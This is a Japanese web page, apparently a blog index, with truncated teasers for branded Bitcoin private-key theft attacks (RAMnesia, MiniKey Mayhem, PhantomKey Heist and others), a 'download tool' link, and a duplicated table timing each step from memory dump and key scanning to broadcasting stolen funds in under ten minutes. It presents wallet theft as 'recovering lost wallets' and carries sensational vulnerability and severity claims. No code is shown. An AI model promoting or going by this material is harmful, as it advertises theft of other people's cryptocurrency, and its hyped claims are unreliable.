  • Key Fragmentation Heist – 断片化の新時代: 部分的な漏洩がどのように完全なBitcoin資産盗難になるか。攻撃者は秘密鍵と秘密データの断片的な漏洩を通じて完全な制御を獲得し、BTC資金を完全に押収する。 Key Fragmentation Heist Attack Key Fragmentation Heist Attack: 攻撃者は、暗号化された秘密鍵を保存するために使用される安全なオブジェクトを脆弱性に変え、鍵を一度に完全にではなく断片的に盗みます…続きを読む
  • Stealth Hijack Attack: Bitcoinスクリプトシリアライゼーションの脆弱性を介して秘密鍵を回復し、被害者のBTCを完全に盗む。攻撃者はカスタムステルススクリプトの公開使用によりウォレットを作成し、秘密鍵はLibBitcoinライブラリの隠しセクションにエンコードされる。 Stealth Hijack は、スクリプト処理のバグを悪用し、データ構造に隠された秘密鍵を盗む攻撃です。Stealth Hijack Attack: スクリプト秘密の盗難 「Stealth Hijack」では…続きを読む
  • MiniKey Mayhem Attack: ブルートフォース秘密鍵攻撃の脆弱性を通じた大量ハッキングと被害者のBTC資金の完全な取得。攻撃者はKDFアルゴリズムを使用した22文字のミニキーの波を通じて失われたBitcoinウォレットを押収する。 MiniKey Mayhem Attack: 直接的な嵐 高速SHA-256キャノンを搭載したサイバーストームトルーパーが「MiniKey要塞」に突入する様子を想像してください。「直接的な嵐」の間、攻撃者は22文字のミニキーの波を発射します…続きを読む
  • シャーマンズ・ゲート攻撃:HD派生と、マスターキーを通じて攻撃者が段階的にビットコイン資金を完全に掌握する、秘密鍵の復元と全BTC窃取を可能にする目に見えない脆弱性 シャーマンズ・ゲート攻撃 「シャーマンズ・ゲート攻撃」攻撃クラスは、HDウォレットにおける非ハードニング派生の基本的な結果であり、数多くのハッキングによって確認されています。秘密鍵の…続きを読む
  • ファントムキー・ヘイスト攻撃:秘密鍵の目に見えない漏洩と、失われたビットコインウォレットへのアクセス復元、被害者の残高を完全に掌握。攻撃者は友好的に秘密鍵監査にモジュールを注入する ファントムキー・ヘイスト:目に見えない秘密鍵奪取攻撃 ファントムキー・ヘイストは、無害なC++演算子呼び出しを大規模なデジタル財宝強奪に変えます。ファントムキー・ヘイスト攻撃 重大な「ファントムキー・ヘイスト」脆弱性は、…続きを読む
  • RAMnesia攻撃:RAMベースの暗号ハック。失われたビットコインウォレットから秘密鍵を完全に復元し資金を完全に盗むことを可能にする。攻撃者はメモリの「ブラックボックス」を悪用し、秘密鍵漏洩脆弱性を引き起こし、ビットコイン暗号通貨のセキュリティを破壊する。 RAMnesia攻撃 RAMnesiaは、攻撃者が被害者のRAMを忘れられた秘密鍵を狩るための「ブラックボックス」に変える大胆な暗号攻撃です。攻撃シナリオでは、ハッカーは…続きを読む

  • Read more

    ツールをダウンロード
    プロセス時間機器
    メモリダンプの取得5~30秒方法による
    16GBダンプのスキャン2~5分MacBook Air (M1)
    1000個の候補鍵の検証30秒MacBook Air (M1)
    アドレス生成10秒MacBook Air (M1)
    資金の転送(ブロードキャスト)< 1秒インターネット
    完全侵害の合計< 10分MacBook Air (M1)
    側面評価注釈
    CVE-2025-60013 (HSM init)CVSS 5.7 (Medium)公式には低いが、エントリポイントとして機能
    Scalar Venom AttackCVSS 8.5+ (High/Critical)実質的に重大な影響
    複合攻撃CVSS 9.5+ (Critical)秘密鍵の完全な侵害
    侵害からの回復不可能不可逆的な資金喪失
    プロセス時間機器
    メモリダンプの取得5-30 sec方法に依存
    16GBダンプのスキャン2-5 minMacBook Air (M1)
    1000個の候補鍵の検証30 secMacBook Air (M1)
    アドレス生成10 secMacBook Air (M1)
    資金転送(ブロードキャスト)< 1 secInternet
    完全な侵害の合計< 10 minutesMacBook Air (M1)